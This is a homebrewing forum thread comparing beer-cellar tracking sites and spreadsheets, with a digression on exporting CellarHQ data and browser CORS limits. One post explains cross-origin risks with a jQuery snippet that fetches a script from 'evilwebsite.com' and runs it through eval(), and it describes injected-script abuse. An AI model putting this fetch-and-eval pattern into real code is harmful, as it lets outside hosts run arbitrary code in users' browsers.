cellarhq vs beercellar.me

Homebrew Talk - Beer, Wine, Mead, & Cider Brewing Discussion Forum

Help Support Homebrew Talk - Beer, Wine, Mead, & Cider Brewing Discussion Forum:

This site may earn a commission from merchant affiliate links, including eBay, Amazon, and others.

kzeon

Well-Known Member
Joined
Apr 30, 2014
Messages
581
Reaction score
4,543
Location
Montreal, Québec, Canada
I've been on cellarhq for a long time, and I'm not sure if it's me, if it's them, the big update that occured a few months ago, or if it's related to the size of my cellar, but it's getting super slow and sluggish to add stuff on it. To the point where I'm pretty fed up with it. beercellar.me seems very nice, easier to play with quantity and clearer, but before adding 225 unique beers to beercellar.me, I'd like to get the confirmation that it's worth it and that I'm not going to do all this work to then realize it has major pitfalls too...

Any cue? Another solution I'm not aware of that is better than those two?

skank you!
 
I just use a google doc. I have been meaning to add conditional formatting and maybe some other bits and pieces (drop downs for style/size etc) but it's pretty easy to just type in and update.

Link to my template.

https://docs.google.com/spreadsheets/d/1yhFp_JVCYfM19CVE2gmTYRKjfTrhtzeXgqU0AUm8ccU/edit?usp=sharing
Thanks, looking clean. I really like the fact that mybeercellar links to BA directly, at least I don't have to google stuff out.

Will give a shot to your template!
 
I've been on cellarhq for a long time, and I'm not sure if it's me, if it's them, the big update that occured a few months ago, or if it's related to the size of my cellar, but it's getting super slow and sluggish to add stuff on it. To the point where I'm pretty fed up with it. beercellar.me seems very nice, easier to play with quantity and clearer, but before adding 225 unique beers to beercellar.me, I'd like to get the confirmation that it's worth it and that I'm not going to do all this work to then realize it has major pitfalls too...

Any cue? Another solution I'm not aware of that is better than those two?

skank you!
Not just you. cellarHQ has been glitchy and terrible ever since that update. I was always miffed at the system in place for adding beers as well. Many duplicate or flat out incorrect entries for breweries/beers
 
Last edited:
Thanks, looking clean. I really like the fact that mybeercellar links to BA directly, at least I don't have to google stuff out.

Will give a shot to your template!

I like a clean spreadsheet. No clutter, no stress. It should total up at the bottom as well. I'm thinking about adding a column in for vintages (like a 2014 bottling of a 2010 beer or whatever)
 
google doc supremacy. incredibly easy to enter data and access it both from my laptop and phone. it's also easy as hell to export data or to make graphs or whatever. i'm trying to drink down my cellar and i have a graph set up of number of bottles over time. it's cool to watch it go down.

not to mention that google services are going to be way more reliable than pretty much anything else.
 
I know this thread is a little old but there used to be a way to export data from cellarhq to excel. Anyone know how to do that? I too am getting annoyed with their layout and slooowwww site.
 
I know this thread is a little old but there used to be a way to export data from cellarhq to excel. Anyone know how to do that? I too am getting annoyed with their layout and slooowwww site.
Did a search and found this:
FWIW - I was able to get my list from Cellar HQ over to Excel pretty easily. Using Excel for Mac, I simply...

- Clicked on the "Your Cellar" link on Cellar HQ
- Manually drag-selected to get only the rows of entries, not the entire page
- Go over to Excel > new document > click in the top left cell > paste special > text
- Delete the two columns that the pencil and "x" icon create
- Bob's your uncle

I'm bored at work, I'll see if I can write something in javascript to do it automatically.
 
OK, I made one. It's not perfect yet but it seems to be working. I hosted the code here:


If you click the download link and open the downloaded html file in internet explorer it works. You need IE 10 or higher though, it has HTML5.

Doesn't work on my chrome browser, but mine is set up all kinds of weird so it may work on your chrome. Haven't tested it with firefox.

It saves it as a CSV file which can be loaded via any spreadsheet program. There's a weird issue with the formatting of apostrophes but I'll figure it out tomorrow.

Hell maybe I can spruce it all up and package it nicely with cool memes and marquee text, but the baseline is working here.

Basically you paste your cellarhq address and hit save file.
 
So pastebin is making it weird.
Best bet is to download it here: http://www.mediafire.com/view/7oc7x35zxilikza/cellarhqtocsv.html
Open in Internet Explorer, paste in cellarhq and hit save.

If someone here is running a webserver they could just host the html, it uses two external libraries that are already hosted, JQuery (for ajax) and FileSaver.js to utilize HTML5 to save a file.
 
So pastebin is making it weird.
Best bet is to download it here: http://www.mediafire.com/view/7oc7x35zxilikza/cellarhqtocsv.html
Open in Internet Explorer, paste in cellarhq and hit save.

If someone here is running a webserver they could just host the html, it uses two external libraries that are already hosted, JQuery (for ajax) and FileSaver.js to utilize HTML5 to save a file.
it's a little tricky, given that the polled data is on a different server and most of the browsers will forbid the retrieval (XSS).

Will try to take a few minutes tomorrow to fix this if somebody doesn't do it before me.
 
it's a little tricky, given that the polled data is on a different server and most of the browsers will forbid the retrieval (XSS).

Will try to take a few minutes tomorrow to fix this if somebody doesn't do it before me.
So I've been reading up on CORS and stuff, and I hosted the file on a local webserver to eliminate any possible issues from accessing a local file instead of an http address but it's still not working.

Apparently cellarHQ has to put this in their response headers for this method to work: Access-Control-Allow-Origin: *
Which would allow all domains to access their stuff it seems.

Yeah even in IE I get the error: Origin http://192.168.101.121 not found in Access-Control-Allow-Origin header.

What's weird is it will work if I open the html file locally in IE... Anyway a lot of information on CORS seems to assume I control both servers, going to see what else I can find about this.
 
So I've been reading up on CORS and stuff, and I hosted the file on a local webserver to eliminate any possible issues from accessing a local file instead of an http address but it's still not working.

Apparently cellarHQ has to put this in their response headers for this method to work: Access-Control-Allow-Origin: *
Which would allow all domains to access their stuff it seems.

Yeah even in IE I get the error: Origin http://192.168.101.121 not found in Access-Control-Allow-Origin header.

What's weird is it will work if I open the html file locally in IE... Anyway a lot of information on CORS seems to assume I control both servers, going to see what else I can find about this.
Yep, the javascript go-retrieve-it approach is not going to work unless you get cellarhq's owner to make the site accessible to cross-origin requests.

Barring them enabling that for you, options are to minify the code into something that can be run when on a cellar page (i.e. paste: "javascript: alert('hello');" ) into the URL bar so that it runs from within the page you are on (which can also be confusing because most browsers will remove the 'javascript:' from the pasted text as a security measure). Or, to run a server that will proxy the GET requests for you
 
Yep, the javascript go-retrieve-it approach is not going to work unless you get cellarhq's owner to make the site accessible to cross-origin requests.

Barring them enabling that for you, options are to minify the code into something that can be run when on a cellar page (i.e. paste: "javascript: alert('hello');" ) into the URL bar so that it runs from within the page you are on (which can also be confusing because most browsers will remove the 'javascript:' from the pasted text as a security measure). Or, to run a server that will proxy the GET requests for you
Seems weird, I mean it's just a GET request right? Why would the server treat it differently than if you just went to that address in your browser? And why does it work in IE when it's a local file?

Weird ****... yeah running the code in the console or url bar seems less than ideal. Maybe I'll just write a C# program or something, it just seems this would be a common task to do in a browser. I mean it's just parsing the html table.
 
Seems weird, I mean it's just a GET request right? Why would the server treat it differently than if you just went to that address in your browser? And why does it work in IE when it's a local file?

Weird ****... yeah running the code in the console or url bar seems less than ideal. Maybe I'll just write a C# program or something, it just seems this would be a common task to do in a browser. I mean it's just parsing the html table.
Thing is, the GET request could pull malicious JS then executed in the callback. If somebody find a way to insert JS, they can easily do anything after. Might seems hard to make it happen, but it isn't. If somebody gets able to slip in some unclean stuff on your page, you get the following easy attack:

Code:
$.get('http://evilwebsite.com/js/malicious.js', function(data) {
   eval(data); // you're ****ed
});

Anyway, got something in like 5 minutes for you. It's nasty as hell, a few manual steps, but whatever:

https://jsfiddle.net/vhdn26xa/1/

Another easy way to do it, to bypass the CORS limiation would be to have a server-sided script that does a cURL to the cellar, grab the HTML, returns it to the JS and tada. But my previous cheapo solution works well too and I'm just lazy hah
 
Thing is, the GET request could pull malicious JS then executed in the callback. If somebody find a way to insert JS, they can easily do anything after. Might seems hard to make it happen, but it isn't. If somebody gets able to slip in some unclean stuff on your page, you get the following easy attack:

Code:
$.get('http://evilwebsite.com/js/malicious.js', function(data) {
   eval(data); // you're ****ed
});

Anyway, got something in like 5 minutes for you. It's nasty as hell, a few manual steps, but whatever:

https://jsfiddle.net/vhdn26xa/1/

Another easy way to do it, to bypass the CORS limiation would be to have a server-sided script that does a cURL to the cellar, grab the HTML, returns it to the JS and tada. But my previous cheapo solution works well too and I'm just lazy hah
Holy. ****ing. ****. evilwebsite.com is real site, and I just lost my ****.
 
Thing is, the GET request could pull malicious JS then executed in the callback. If somebody find a way to insert JS, they can easily do anything after. Might seems hard to make it happen, but it isn't. If somebody gets able to slip in some unclean stuff on your page, you get the following easy attack:

Code:
$.get('http://evilwebsite.com/js/malicious.js', function(data) {
   eval(data); // you're ****ed
});

Anyway, got something in like 5 minutes for you. It's nasty as hell, a few manual steps, but whatever:

https://jsfiddle.net/vhdn26xa/1/

Another easy way to do it, to bypass the CORS limiation would be to have a server-sided script that does a cURL to the cellar, grab the HTML, returns it to the JS and tada. But my previous cheapo solution works well too and I'm just lazy hah
Yeah, not looking to host a server for this lol. So .get isn't going to work for this, except if you open and re-save the html and use IE....why the hell does it work then?

I wonder if I could make a chrome extension that would do it... It just seems stupid to me that I can't make an html site just view the standard get response, I mean it's up to me what I do with that data right? IDK... there's a lot about security I don't understand but in your example of the eval it would only be harmful if I was running an eval on that **** right?

Because if someone injected malicious code into my .get the worst that could happen is the regex fails to match right? I mean I'm not putting an eval in there, I don't think I've ever used eval once.

Anyway, I'm going to look into making an extension for this I guess, idk.... a .net application would probably the the most portable. I don't do a lot of .net work though, hell I don't even have Visual Studio on this PC, I only write in C for an embedded platform we are working with.
 
Seems weird, I mean it's just a GET request right? Why would the server treat it differently than if you just went to that address in your browser? And why does it work in IE when it's a local file?

Weird ****... yeah running the code in the console or url bar seems less than ideal. Maybe I'll just write a C# program or something, it just seems this would be a common task to do in a browser. I mean it's just parsing the html table.
This thread is pretty derailed at this point, but my understanding of why a site has to explicitly enable CORS is to prevent getting DOSed.

For example, if I wanted to DOS some site, I could put a do-loop on seekabrew.com that will make a ton of user requests in the background. That site would have no real way of preventing the attack because the "attackers" are not malicious. CORS means that *most* users' browsers will not support this calling pattern unless the site has whitelisted them to do so, which is somewhat of an acknowledgement that they are scaled to handle lots of requests coming from anywhere
 
Yeah, not looking to host a server for this lol. So .get isn't going to work for this, except if you open and re-save the html and use IE....why the hell does it work then?

I wonder if I could make a chrome extension that would do it... It just seems stupid to me that I can't make an html site just view the standard get response, I mean it's up to me what I do with that data right? IDK... there's a lot about security I don't understand but in your example of the eval it would only be harmful if I was running an eval on that **** right?

Because if someone injected malicious code into my .get the worst that could happen is the regex fails to match right? I mean I'm not putting an eval in there, I don't think I've ever used eval once.

Anyway, I'm going to look into making an extension for this I guess, idk.... a .net application would probably the the most portable. I don't do a lot of .net work though, hell I don't even have Visual Studio on this PC, I only write in C for an embedded platform we are working with.
In fact, just take this example.

You are on a website viewing somebody's profile page where the person can add custom freeform text. The website doesn't escape and clean properly the user submitted data and an unescaped Javascript snippet gets on the page. Every person viewing the page will execute the unescaped JS. If I add the malicious previous example, "random" people will have the JS execute everytime they go on the page. Now, let's say instead of pointing out to evilwebsite.com, I point to http://facebook.com/logout.php. You get the pattern? You wouldn't be happy being logged out of FB, and FB wouldn't be happy to see that kind of behavior. DDOS would be SOOO easy this way....

The simplest to do, is just to have a static HTML page as the one originally submitted, and add a get.php script that will, in the background, do a cURL to cellarhq, grab the HTML and return. But at this point, might just as well do everything server-side. I'm running out of time right now, but could try to see if I could put something together.
 
Me in here right now


o7x1oEZ.gif
 
Does anyone else get a blank page when you go to cellarhq? I don't even get the floating credentials window.
 
Haven't forgotten about this ****! thefleshlight did you ever get your csv in the meantime?
Your site or program or whatever it's called never worked; just gave me a blank white website page. So I just copied in manually my stuff like you (or someone else) suggested. But I know of put it in excel in a different manner before, however this copy/pasta is just fine too.
 
As others have said, Excel ss on google docs ftw. I'm no excel wizard, but I've figured out how to do run totals on different size of bottles, overall total, and total ounces.
 
Is anyone else having issues with cellarhq? I'm getting dodgy security warnings.

(Yes, I know there are other, better sites but I'm too lazy to reenter everything)
 
Is anyone else having issues with cellarhq? I'm getting dodgy security warnings.

(Yes, I know there are other, better sites but I'm too lazy to reenter everything)
Yeah I've been having them lately as well. Looks like their security certificate is lapsed. I don't think there's anything wrong... just laziness on their part.
 
FYI: The Beer Cellar is still around! (I have an update thread here as well.) Previously at https://www.beercellar.me, the site can now be found at https://cellar.beer (all old links automatically redirect).

Not sure where the CellarHQ devs went. There was chatter a long while back about finding some way to fund running the site, but pretty much radio silence since then.
 
Is anyone else having issues with cellarhq? I'm getting dodgy security warnings.

(Yes, I know there are other, better sites but I'm too lazy to reenter everything)
Assuming you can export your data, you should be able to import it to one of those other better sites. Ours takes a CSV.
 
I was about to say I didn't think CellarHQ had an export feature, but it looks like they added one at some point. Handy.
 
I imagine they'd give a heads up and a window for folks to export their data, but, might be a good time to grab a backup CSV of your CellarHQ data just in case. This from their Twitter account a couple days ago:
Is anyone interested in taking over cellarhq? rob and i no longer have the time/interest - as proven by it taking me a month to renew our SSL certs.
 
Finally fed up with the ******** at CellarHQ, just signed up for the one trickytunadicky proposed here. Hopefully CellarHQ will let me log in at some point so I can export my list.

If this new site doesn't work out for me I'm going with a spreadsheet on Google My Drive
 
Back
Top